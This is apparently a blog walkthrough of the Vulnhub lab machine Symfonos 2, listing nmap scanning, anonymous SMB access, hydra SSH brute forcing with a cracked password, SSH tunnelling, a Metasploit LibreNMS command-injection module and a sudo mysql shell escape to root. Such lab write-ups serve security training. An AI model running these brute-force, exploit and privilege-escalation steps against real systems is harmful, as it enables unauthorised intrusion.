Vulnhub – Symfonos 2 Walkthrough

We start by scanning the target with nmap –A –T4 –p- –vv

Viewing smb shares with smbclient -L \\\\ anf then connecting to it with smbclient \\\\\\anonymous and downloading a file log.txt

Ok from the log file we got a username aeolus:

We can use hydra to brute force ssh after confirming the user aeolus have ssh privilege:

Hydra –l aeolus –P /root/pass/rockyou.txt ssh:// –f –vV

Now we login with ssh using the password sergioteamo:

Using script we can see there is port 3306 mysql is running let’s explore it more:

Now we got a file in apache directory with the name librenms where we can see there is a service is running on port 8080:

Now what we can do is open a tunnel to port 8080 using ssh tunneling like ssh –L 8080: aeolus@ and use the password for the user aeolus as before and we got it but this time there is a tunnel to the port 8080

Now we browse to the page localhost:8080 and we got a new service  which is librenms, searching for it on searchsploit we get a metasploit exploit for it so let’s start metasploit:

In metasploit use exploit/linux/http/librenms_addhost_cmd_inject

Ok we got in as user cronus this time now this user got sudo privilege:

Ok the command will be sudo -u root /usr/bin/mysql mysql -e ‘\! /bin/sh’

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s